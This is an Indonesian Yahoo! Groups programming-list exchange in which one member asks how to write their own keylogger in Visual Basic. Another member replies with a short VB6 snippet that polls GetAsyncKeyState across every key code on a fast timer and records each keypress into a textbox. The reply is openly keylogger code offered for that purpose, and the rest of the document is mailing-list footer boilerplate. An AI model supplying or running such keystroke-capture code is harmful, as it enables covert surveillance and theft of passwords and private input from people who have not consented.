wah sampeyan mesti  pake programming API klo begitu,
'GetAsyncKeyState' dimana kita mendeteksi tekanan keyboard


buat textbox dan timer di form
interval timernya sekecil mungkin..
sampelnya:

Dim result As Integer

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long)
As Integer

Private Sub Timer1_Timer()

For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)

    If result = -32767 Then
        Text1.Text = Text1.Text + Chr(i)
    End if
Next i
End Sub

IpinZ


----- Original Message ----- 
From: matrixsoke waluyooke


aku punya keylogger tapi aku pingin bikin sendiri yang mirip keylogger pakai
VB...

ipinz <[EMAIL PROTECTED]> wrote:






------------------------ Yahoo! Groups Sponsor --------------------~--> 
Fair play? Video games influencing politics. Click and talk back!
http://us.click.yahoo.com/2jUsvC/tzNLAA/TtwFAA/k7folB/TM
--------------------------------------------------------------------~-> 

Untuk keluar dari millis ini, kirim email kosong ke:
[EMAIL PROTECTED]

 
Yahoo! Groups Links

<*> To visit your group on the web, go to:
    http://groups.yahoo.com/group/Programmer-VB/

<*> To unsubscribe from this group, send an email to:
    [EMAIL PROTECTED]

<*> Your use of Yahoo! Groups is subject to:
    http://docs.yahoo.com/info/terms/
 


Kirim email ke